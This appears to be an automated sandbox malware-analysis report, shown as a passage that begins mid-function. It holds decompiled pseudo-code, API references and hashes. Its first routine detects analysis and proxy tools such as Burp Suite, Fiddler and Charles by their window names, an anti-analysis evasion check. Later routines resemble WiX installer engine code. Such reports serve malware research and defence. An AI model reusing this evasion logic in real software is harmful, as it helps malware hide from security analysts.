                                                                                                                                                                  									__eflags = _t43;
                                                                                                                                                                  									if(__eflags <= 0) {
                                                                                                                                                                  										L20:
                                                                                                                                                                  										_t45 = E1000CAD0( &_v268);
                                                                                                                                                                  										_t98 = _t97 + 4;
                                                                                                                                                                  										__eflags = _t45;
                                                                                                                                                                  										if(__eflags <= 0) {
                                                                                                                                                                  											L23:
                                                                                                                                                                  											_t46 = E10019390(_t70, _t87, __eflags,  &_v532, "SunAwtFrame");
                                                                                                                                                                  											_t99 = _t98 + 8;
                                                                                                                                                                  											__eflags = _t46;
                                                                                                                                                                  											if(_t46 == 0) {
                                                                                                                                                                  												goto L30;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t48 = E1000CAD0( &_v268);
                                                                                                                                                                  											_t100 = _t99 + 4;
                                                                                                                                                                  											__eflags = _t48;
                                                                                                                                                                  											if(__eflags <= 0) {
                                                                                                                                                                  												L27:
                                                                                                                                                                  												__eflags = E1000CAD0( &_v268);
                                                                                                                                                                  												if(__eflags <= 0) {
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												_t51 = E10019390(_t70, _t87, __eflags,  &_v268, "Burp Suite");
                                                                                                                                                                  												__eflags = _t51;
                                                                                                                                                                  												if(_t51 == 0) {
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												 *0x10335dcc = 1;
                                                                                                                                                                  												return 0;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t53 = E10019390(_t70, _t87, __eflags,  &_v268, "Charles");
                                                                                                                                                                  											_t100 = _t100 + 8;
                                                                                                                                                                  											__eflags = _t53;
                                                                                                                                                                  											if(_t53 == 0) {
                                                                                                                                                                  												goto L27;
                                                                                                                                                                  											}
                                                                                                                                                                  											 *0x10335dcc = 1;
                                                                                                                                                                  											return 0;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t55 = E10019390(_t70, _t87, __eflags,  &_v268, "ASExplorer");
                                                                                                                                                                  										_t98 = _t98 + 8;
                                                                                                                                                                  										__eflags = _t55;
                                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                                  											goto L23;
                                                                                                                                                                  										}
                                                                                                                                                                  										 *0x10335dcc = 1;
                                                                                                                                                                  										return 0;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t57 = E10019390(_t70, _t87, __eflags,  &_v268, "Telerik Fiddler");
                                                                                                                                                                  									_t97 = _t97 + 8;
                                                                                                                                                                  									__eflags = _t57;
                                                                                                                                                                  									if(_t57 == 0) {
                                                                                                                                                                  										goto L20;
                                                                                                                                                                  									}
                                                                                                                                                                  									 *0x10335dcc = 1;
                                                                                                                                                                  									return 0;
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = E1000CAD0( &_v268);
                                                                                                                                                                  								if(__eflags <= 0) {
                                                                                                                                                                  									L16:
                                                                                                                                                                  									goto L30;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t61 = E10019390(_t70, _t87, __eflags,  &_v268, "HTTP Debugger");
                                                                                                                                                                  								__eflags = _t61;
                                                                                                                                                                  								if(_t61 == 0) {
                                                                                                                                                                  									goto L16;
                                                                                                                                                                  								}
                                                                                                                                                                  								 *0x10335dcc = 1;
                                                                                                                                                                  								return 0;
                                                                                                                                                                  							}
                                                                                                                                                                  							 *0x10335dcc = 1;
                                                                                                                                                                  							return 0;
                                                                                                                                                                  						}
                                                                                                                                                                  						 *0x10335dcc = 1;
                                                                                                                                                                  						return 0;
                                                                                                                                                                  					}
                                                                                                                                                                  					 *0x10335dcc = 1;
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t66 = E1000CAD0( &_v268);
                                                                                                                                                                  				_t110 = _t66;
                                                                                                                                                                  				if(_t66 <= 0 || E10019390(__ebx, _t87, _t110,  &_v268, "WPE") == 0) {
                                                                                                                                                                  					goto L30;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					 *0x10335dcc = 1;
                                                                                                                                                                  					return 0;
                                                                                                                                                                  				}
                                                                                                                                                                  			}



































                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001944E
                                                                                                                                                                  • _memset.LIBCMT ref: 1001946B
                                                                                                                                                                  • GetClassNameA.USER32(?,00000000,00000104), ref: 10019483
                                                                                                                                                                  • GetWindowTextA.USER32 ref: 10019499
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194A6
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 1001939B
                                                                                                                                                                    • Part of subcall function 10019390: _strlen.LIBCMT ref: 100193A9
                                                                                                                                                                  • _strlen.LIBCMT ref: 100194D5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _strlen$_memset$ClassNameTextWindow
                                                                                                                                                                  • String ID: ASExplorer$Afx:400000:8:10003:0:$Burp Suite$Charles$HTTP Debugger$SunAwtFrame$TCPViewClass$TStdHttpAnalyzerForm$Telerik Fiddler$WPE$XTPMainFrame$gdkWindowToplevel
                                                                                                                                                                  • API String ID: 1565133231-1140939848
                                                                                                                                                                  • Opcode ID: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
                                                                                                                                                                  • Instruction ID: 51e88d16b42fffacdf90acd9036bc3218a7670d11f06c4b4a6332502e68566f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ad7c26c6e480e82f6b3811a957d2b8bad39d8203231eaa86610e8d92c2d0a26
                                                                                                                                                                  • Instruction Fuzzy Hash: 7851B6B991430956E710CB71AC89FDA72B8EB20345F440864F91ADD182FBB1F7C8CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E00401BD3(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed short _a8, intOrPtr _a12, signed short* _a16) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed short _v16;
                                                                                                                                                                  				struct _OSVERSIONINFOW _v292;
                                                                                                                                                                  				signed short* _v296;
                                                                                                                                                                  				signed int _v300;
                                                                                                                                                                  				signed int _v304;
                                                                                                                                                                  				signed int _v308;
                                                                                                                                                                  				intOrPtr _v312;
                                                                                                                                                                  				signed int _v316;
                                                                                                                                                                  				signed int _v320;
                                                                                                                                                                  				signed int _v324;
                                                                                                                                                                  				signed int _v328;
                                                                                                                                                                  				signed short _v408;
                                                                                                                                                                  				intOrPtr _v564;
                                                                                                                                                                  				intOrPtr _v1260;
                                                                                                                                                                  				signed short _v1276;
                                                                                                                                                                  				char _v1336;
                                                                                                                                                                  				intOrPtr _v1464;
                                                                                                                                                                  				intOrPtr _v1476;
                                                                                                                                                                  				intOrPtr _v1496;
                                                                                                                                                                  				char _v1520;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t70;
                                                                                                                                                                  				signed short _t82;
                                                                                                                                                                  				signed short _t85;
                                                                                                                                                                  				signed short _t87;
                                                                                                                                                                  				signed short _t89;
                                                                                                                                                                  				signed short _t92;
                                                                                                                                                                  				signed short _t102;
                                                                                                                                                                  				intOrPtr _t123;
                                                                                                                                                                  				signed short _t130;
                                                                                                                                                                  				signed short _t133;
                                                                                                                                                                  				signed short _t139;
                                                                                                                                                                  				void* _t142;
                                                                                                                                                                  				signed int _t143;
                                                                                                                                                                  				void* _t149;
                                                                                                                                                                  				signed short _t150;
                                                                                                                                                                  				signed short* _t151;
                                                                                                                                                                  				intOrPtr _t152;
                                                                                                                                                                  				signed short _t153;
                                                                                                                                                                  				signed short _t164;
                                                                                                                                                                  				signed short _t167;
                                                                                                                                                                  				signed int _t168;
                                                                                                                                                                  				void* _t169;
                                                                                                                                                                  				void* _t170;
                                                                                                                                                                  
                                                                                                                                                                  				_t149 = __edx;
                                                                                                                                                                  				_t144 = __ecx;
                                                                                                                                                                  				_t70 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t70 ^ _t168;
                                                                                                                                                                  				_t150 = _a8;
                                                                                                                                                                  				_v312 = _a4;
                                                                                                                                                                  				_push(0x11c);
                                                                                                                                                                  				_v296 = _a16;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v292);
                                                                                                                                                                  				_v300 = 0;
                                                                                                                                                                  				_v320 = 0;
                                                                                                                                                                  				_v328 = 0;
                                                                                                                                                                  				_v324 = 0;
                                                                                                                                                                  				_v316 = 0;
                                                                                                                                                                  				E004267C0(_t142, __ecx, _t150, 0, __eflags);
                                                                                                                                                                  				_push(0x4a8);
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v1520);
                                                                                                                                                                  				_v304 = 0;
                                                                                                                                                                  				_v308 = 0;
                                                                                                                                                                  				_t143 = 0;
                                                                                                                                                                  				E004267C0(0, __ecx, _t150, 0, __eflags);
                                                                                                                                                                  				_t170 = _t169 + 0x18;
                                                                                                                                                                  				if(E00401036(__eflags,  &_v1520) >= 0) {
                                                                                                                                                                  					_v1476 = _a12;
                                                                                                                                                                  					E00430EB8(3, 0);
                                                                                                                                                                  					_t82 = E00402019();
                                                                                                                                                                  					__imp__CoInitializeEx(0, 0);
                                                                                                                                                                  					__eflags = _t82;
                                                                                                                                                                  					if(_t82 >= 0) {
                                                                                                                                                                  						_v300 = 1;
                                                                                                                                                                  						E00430D08(GetModuleHandleW(0));
                                                                                                                                                                  						_v320 = 1;
                                                                                                                                                                  						_t85 = E00432369();
                                                                                                                                                                  						_t161 = _t85;
                                                                                                                                                                  						__eflags = _t85;
                                                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                                                  							_v328 = _v300;
                                                                                                                                                                  							_t87 = E0043541A(_t144, _t149, _t161, __eflags);
                                                                                                                                                                  							__eflags = _t87;
                                                                                                                                                                  							if(_t87 >= 0) {
                                                                                                                                                                  								_v324 = _v300;
                                                                                                                                                                  								_t89 = E00435DCA(_v300);
                                                                                                                                                                  								__eflags = _t89;
                                                                                                                                                                  								if(_t89 >= 0) {
                                                                                                                                                                  									_v316 = _v300;
                                                                                                                                                                  									_v292.dwOSVersionInfoSize = 0x11c;
                                                                                                                                                                  									_t92 = GetVersionExW( &_v292);
                                                                                                                                                                  									__eflags = _t92;
                                                                                                                                                                  									if(_t92 != 0) {
                                                                                                                                                                  										E00431C19( &_v304, 0);
                                                                                                                                                                  										__eflags = _t150;
                                                                                                                                                                  										_t96 =  !=  ? _t150 : 0x43b580;
                                                                                                                                                                  										_push( !=  ? _t150 : 0x43b580);
                                                                                                                                                                  										_push(_v304);
                                                                                                                                                                  										_push(_v16 & 0x0000ffff);
                                                                                                                                                                  										_push(_v292.dwBuildNumber);
                                                                                                                                                                  										_push(_v292.dwMinorVersion);
                                                                                                                                                                  										_push(_v292.dwMajorVersion);
                                                                                                                                                                  										E00402003(2, 0x20000001, "3.8.1128.0");
                                                                                                                                                                  										_t170 = _t170 + 0x24;
                                                                                                                                                                  										__eflags = _v304;
                                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                                  											E004380AB(_v304);
                                                                                                                                                                  											_t37 =  &_v304;
                                                                                                                                                                  											 *_t37 = _v304 & 0;
                                                                                                                                                                  											__eflags =  *_t37;
                                                                                                                                                                  										}
                                                                                                                                                                  										_t164 = E00411570(_t143, _t144, _t149, __eflags, _t150,  &_v1520);
                                                                                                                                                                  										__eflags = _t164;
                                                                                                                                                                  										if(_t164 >= 0) {
                                                                                                                                                                  											_t102 = _v408;
                                                                                                                                                                  											__eflags = _t102;
                                                                                                                                                                  											if(_t102 == 0) {
                                                                                                                                                                  												_v308 = _v300;
                                                                                                                                                                  												_t164 = E004016ED(_t144, _v312,  &_v1520);
                                                                                                                                                                  												__eflags = _t164;
                                                                                                                                                                  												if(_t164 >= 0) {
                                                                                                                                                                  													L30:
                                                                                                                                                                  													_t151 = _v296;
                                                                                                                                                                  													_t143 = _v1496;
                                                                                                                                                                  													 *_t151 = _v1276;
                                                                                                                                                                  													goto L31;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to run per-user mode.");
                                                                                                                                                                  												goto L21;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t130 = _t102 - 1;
                                                                                                                                                                  											__eflags = _t130;
                                                                                                                                                                  											if(_t130 == 0) {
                                                                                                                                                                  												_t164 = E004014BB(_t144, _t149, _v312, _t150,  &_v1520);
                                                                                                                                                                  												__eflags = _t164;
                                                                                                                                                                  												if(_t164 >= 0) {
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to run per-machine mode.");
                                                                                                                                                                  												goto L21;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t133 = _t130 - 1;
                                                                                                                                                                  											__eflags = _t133;
                                                                                                                                                                  											if(_t133 == 0) {
                                                                                                                                                                  												_v308 = _v300;
                                                                                                                                                                  												_t164 = E004016A6(_v312,  &_v1520);
                                                                                                                                                                  												__eflags = _t164;
                                                                                                                                                                  												if(_t164 >= 0) {
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to run embedded mode.");
                                                                                                                                                                  												goto L21;
                                                                                                                                                                  											}
                                                                                                                                                                  											__eflags = _t133 == 1;
                                                                                                                                                                  											if(_t133 == 1) {
                                                                                                                                                                  												_t164 = E00401928(_t150, _a12);
                                                                                                                                                                  												__eflags = _t164;
                                                                                                                                                                  												if(_t164 >= 0) {
                                                                                                                                                                  													goto L30;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to run RunOnce mode.");
                                                                                                                                                                  												goto L21;
                                                                                                                                                                  											}
                                                                                                                                                                  											_t164 = 0x8000ffff;
                                                                                                                                                                  											_push("Invalid run mode.");
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_push("Failed to initialize core.");
                                                                                                                                                                  										}
                                                                                                                                                                  										goto L21;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t139 = GetLastError();
                                                                                                                                                                  									__eflags = _t139;
                                                                                                                                                                  									_t167 =  <=  ? _t139 : _t139 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  									__eflags = _t167;
                                                                                                                                                                  									_t164 =  >=  ? 0x80004005 : _t167;
                                                                                                                                                                  									E004300D9(0x80004005, "engine.cpp", 0x7a, _t164);
                                                                                                                                                                  									_push("Failed to get OS info.");
                                                                                                                                                                  									goto L21;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to initialize XML util.");
                                                                                                                                                                  								goto L21;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to initialize Wiutil.");
                                                                                                                                                                  							goto L21;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push("Failed to initialize Regutil.");
                                                                                                                                                                  						goto L21;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to initialize COM.");
                                                                                                                                                                  					goto L21;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_push("Failed to initialize engine state.");
                                                                                                                                                                  					L21:
                                                                                                                                                                  					E00430A57();
                                                                                                                                                                  					_t151 = _v296;
                                                                                                                                                                  					_t144 = _t164;
                                                                                                                                                                  					L31:
                                                                                                                                                                  					if(_v304 != 0) {
                                                                                                                                                                  						E004380AB(_v304);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t164 < 0 && _v564 == 0) {
                                                                                                                                                                  						E00430D33(_t144, _t149, _t151, 0, L"Setup", L"_Failed", L"txt", 0, 0, 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					E004089D9( &_v1336);
                                                                                                                                                                  					E00413F69(_t143, _t144, _t149, _v1260);
                                                                                                                                                                  					if(_t143 != 0) {
                                                                                                                                                                  						_t123 = _v1464;
                                                                                                                                                                  						if(_t123 != 0 && _t123 != 6) {
                                                                                                                                                                  							E00402003(2, 0xa0000008, E0040E82A(_t123));
                                                                                                                                                                  							_t170 = _t170 + 0xc;
                                                                                                                                                                  							_t143 = 0;
                                                                                                                                                                  							_t164 = 0x80070bc2;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					E00401A7C(_t143, _t144, _t149, _t151,  &_v1520);
                                                                                                                                                                  					if(_v316 != 0) {
                                                                                                                                                                  						E004360CC();
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v324 != 0) {
                                                                                                                                                                  						E00435810();
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v328 != 0) {
                                                                                                                                                                  						E0043299B();
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v300 != 0) {
                                                                                                                                                                  						__imp__CoUninitialize();
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_v308 != 0) {
                                                                                                                                                                  						if(_t164 >= 0) {
                                                                                                                                                                  							_t153 =  *_t151;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t153 = _t164;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push(E0040E33B(_t143));
                                                                                                                                                                  						E00402003(2, 0x20000007, _t153);
                                                                                                                                                                  						if(_t143 != 0) {
                                                                                                                                                                  							_push(0xa0000005);
                                                                                                                                                                  							E00402003();
                                                                                                                                                                  							_t144 = 2;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					_t152 = _v320;
                                                                                                                                                                  					if(_t152 != 0) {
                                                                                                                                                                  						E00430935(_t144, _t152, 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					if(_t143 != 0) {
                                                                                                                                                                  						E004011BF(_t149);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t191 = _t152;
                                                                                                                                                                  					if(_t152 != 0) {
                                                                                                                                                                  						E00431001(_t144, _t152, _t191, 0);
                                                                                                                                                                  					}
                                                                                                                                                                  					return L004267AF(_t164, _v8 ^ _t168, _t152, _t164);
                                                                                                                                                                  				}
                                                                                                                                                                  			}


















































                                                                                                                                                                  0x00401d3a
                                                                                                                                                                  0x00401d49
                                                                                                                                                                  0x00401d4b
                                                                                                                                                                  0x00401d53
                                                                                                                                                                  0x00401d55
                                                                                                                                                                  0x00401d60
                                                                                                                                                                  0x00401d65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401d65
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401d09
                                                                                                                                                                  0x00401ce8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401ce8
                                                                                                                                                                  0x00401cc7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401cc7
                                                                                                                                                                  0x00401c95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401c65
                                                                                                                                                                  0x00401c65
                                                                                                                                                                  0x00401e0e
                                                                                                                                                                  0x00401e0f
                                                                                                                                                                  0x00401e14
                                                                                                                                                                  0x00401e1b
                                                                                                                                                                  0x00401ec8
                                                                                                                                                                  0x00401ecf
                                                                                                                                                                  0x00401ed7
                                                                                                                                                                  0x00401ed7
                                                                                                                                                                  0x00401ede
                                                                                                                                                                  0x00401efe
                                                                                                                                                                  0x00401efe
                                                                                                                                                                  0x00401f0a
                                                                                                                                                                  0x00401f15
                                                                                                                                                                  0x00401f1c
                                                                                                                                                                  0x00401f1e
                                                                                                                                                                  0x00401f26
                                                                                                                                                                  0x00401f3b
                                                                                                                                                                  0x00401f40
                                                                                                                                                                  0x00401f43
                                                                                                                                                                  0x00401f45
                                                                                                                                                                  0x00401f45
                                                                                                                                                                  0x00401f26
                                                                                                                                                                  0x00401f51
                                                                                                                                                                  0x00401f5d
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f5f
                                                                                                                                                                  0x00401f6b
                                                                                                                                                                  0x00401f6d
                                                                                                                                                                  0x00401f6d
                                                                                                                                                                  0x00401f79
                                                                                                                                                                  0x00401f7b
                                                                                                                                                                  0x00401f7b
                                                                                                                                                                  0x00401f87
                                                                                                                                                                  0x00401f89
                                                                                                                                                                  0x00401f89
                                                                                                                                                                  0x00401f96
                                                                                                                                                                  0x00401f9a
                                                                                                                                                                  0x00401fa0
                                                                                                                                                                  0x00401f9c
                                                                                                                                                                  0x00401f9c
                                                                                                                                                                  0x00401f9c
                                                                                                                                                                  0x00401fa8
                                                                                                                                                                  0x00401fb1
                                                                                                                                                                  0x00401fbb
                                                                                                                                                                  0x00401fbd
                                                                                                                                                                  0x00401fc4
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00401fca
                                                                                                                                                                  0x00401fbb
                                                                                                                                                                  0x00401fcb
                                                                                                                                                                  0x00401fd3
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fd7
                                                                                                                                                                  0x00401fde
                                                                                                                                                                  0x00401fe0
                                                                                                                                                                  0x00401fe0
                                                                                                                                                                  0x00401fe5
                                                                                                                                                                  0x00401fe7
                                                                                                                                                                  0x00401feb
                                                                                                                                                                  0x00401feb
                                                                                                                                                                  0x00402000
                                                                                                                                                                  0x00402000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00401036: InitializeCriticalSection.KERNEL32(00401C5F,?,00000000,?,?,00401C5F), ref: 0040105B
                                                                                                                                                                    • Part of subcall function 00401036: InitializeCriticalSection.KERNEL32(00401D2F,?,?,00401C5F), ref: 00401064
                                                                                                                                                                    • Part of subcall function 00401036: GetCurrentProcess.KERNEL32(00000000,004020E3,004020CB,?,?,00401C5F), ref: 00401082
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,00000003,00000000,?,?,?,?,?,00000000), ref: 00401C89
                                                                                                                                                                  • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401F89
                                                                                                                                                                    • Part of subcall function 00401928: CommandLineToArgvW.SHELL32(?,?,?,00000000,00000000,?,?,?,?), ref: 0040195A
                                                                                                                                                                    • Part of subcall function 00401928: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00401966
                                                                                                                                                                    • Part of subcall function 00401928: CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,?,?,?,?), ref: 00401A50
                                                                                                                                                                    • Part of subcall function 004014BB: ReleaseMutex.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040168E
                                                                                                                                                                    • Part of subcall function 004014BB: CloseHandle.KERNEL32(00000000,?,?,?,00401E79,?,?,?), ref: 00401697
                                                                                                                                                                    • Part of subcall function 004016ED: IsWindow.USER32(?), ref: 004018F7
                                                                                                                                                                    • Part of subcall function 004016ED: PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0040190A
                                                                                                                                                                    • Part of subcall function 004016ED: CloseHandle.KERNEL32(00000000,?,?,?,00401EA4,?,?), ref: 00401919
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleInitialize$CriticalSection$ArgvCommandCurrentErrorLastLineMessageMutexPostProcessReleaseUninitializeWindow
                                                                                                                                                                  • String ID: 3.8.1128.0$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Invalid run mode.$Setup$_Failed$engine.cpp$txt
                                                                                                                                                                  • API String ID: 3179169480-854919460
                                                                                                                                                                  • Opcode ID: d6a9fd4956d7a37eb11e11ee659dc5582ea64274af61c1080618648297fc7606
                                                                                                                                                                  • Instruction ID: 269aca870fc2965c0f0fd274ea9ada3b7ec7bfe6ea1d79aa34964ccbf0876cb8
                                                                                                                                                                  • Opcode Fuzzy Hash: d6a9fd4956d7a37eb11e11ee659dc5582ea64274af61c1080618648297fc7606
                                                                                                                                                                  • Instruction Fuzzy Hash: 6AB19371E406299BDB319B65CC45BEE76B8AF08715F0001ABF908B7291D73C9E818FD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E00409A34(void* __edi, intOrPtr _a4, int _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				void* _v20;
                                                                                                                                                                  				char _v24;
                                                                                                                                                                  				intOrPtr* _t82;
                                                                                                                                                                  				intOrPtr _t108;
                                                                                                                                                                  				intOrPtr* _t125;
                                                                                                                                                                  				intOrPtr* _t126;
                                                                                                                                                                  				intOrPtr _t141;
                                                                                                                                                                  				intOrPtr _t143;
                                                                                                                                                                  
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v20 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v24 = 0;
                                                                                                                                                                  				_t143 = E00435FBE(_a8, L"RelatedBundle",  &_v16);
                                                                                                                                                                  				if(_t143 >= 0) {
                                                                                                                                                                  					_t82 = _v16;
                                                                                                                                                                  					_t124 =  *_t82;
                                                                                                                                                                  					_t143 =  *((intOrPtr*)( *_t82 + 0x20))(_t82,  &_v24);
                                                                                                                                                                  					__eflags = _t143;
                                                                                                                                                                  					if(_t143 >= 0) {
                                                                                                                                                                  						_a8 = 0;
                                                                                                                                                                  						__eflags = _v24;
                                                                                                                                                                  						if(_v24 > 0) {
                                                                                                                                                                  							_t141 = _a4;
                                                                                                                                                                  							while(1) {
                                                                                                                                                                  								_t143 = E00435F1D(_t124, _v16,  &_v20, 0);
                                                                                                                                                                  								__eflags = _t143;
                                                                                                                                                                  								if(_t143 < 0) {
                                                                                                                                                                  									break;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t143 = E00435B5E(_v20, L"Action",  &_v12);
                                                                                                                                                                  								__eflags = _t143;
                                                                                                                                                                  								if(_t143 < 0) {
                                                                                                                                                                  									_push("Failed to get @Action.");
                                                                                                                                                                  									goto L32;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_t143 = E00435B5E(_v20, L"Id",  &_v8);
                                                                                                                                                                  									__eflags = _t143;
                                                                                                                                                                  									if(_t143 < 0) {
                                                                                                                                                                  										_push("Failed to get @Id.");
                                                                                                                                                                  										goto L32;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Detect", 0xffffffff) - 2;
                                                                                                                                                                  										if(__eflags != 0) {
                                                                                                                                                                  											__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Upgrade", 0xffffffff) - 2;
                                                                                                                                                                  											if(__eflags != 0) {
                                                                                                                                                                  												__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Addon", 0xffffffff) - 2;
                                                                                                                                                                  												if(__eflags != 0) {
                                                                                                                                                                  													__eflags = CompareStringW(0x7f, 0, _v12, 0xffffffff, L"Patch", 0xffffffff) - 2;
                                                                                                                                                                  													if(__eflags != 0) {
                                                                                                                                                                  														_t143 = 0x80070057;
                                                                                                                                                                  														E00430A57(0x80070057, "Invalid value for @Action: %ls", _v12);
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t143 = E0043109A(_t141 + 0x2c, __eflags, _t141 + 0x2c,  *(_t141 + 0x30) + 1, 4, 5);
                                                                                                                                                                  														__eflags = _t143;
                                                                                                                                                                  														if(_t143 < 0) {
                                                                                                                                                                  															_push("Failed to resize Patch code array in registration");
                                                                                                                                                                  															goto L32;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															_t124 =  *((intOrPtr*)(_t141 + 0x2c));
                                                                                                                                                                  															 *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x2c)) +  *(_t141 + 0x30) * 4)) = _v8;
                                                                                                                                                                  															_v8 = _v8 & 0x00000000;
                                                                                                                                                                  															_t66 = _t141 + 0x30;
                                                                                                                                                                  															 *_t66 =  *(_t141 + 0x30) + 1;
                                                                                                                                                                  															__eflags =  *_t66;
                                                                                                                                                                  															goto L22;
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  												} else {
                                                                                                                                                                  													_t143 = E0043109A(_t141 + 0x24, __eflags, _t141 + 0x24,  *(_t141 + 0x28) + 1, 4, 5);
                                                                                                                                                                  													__eflags = _t143;
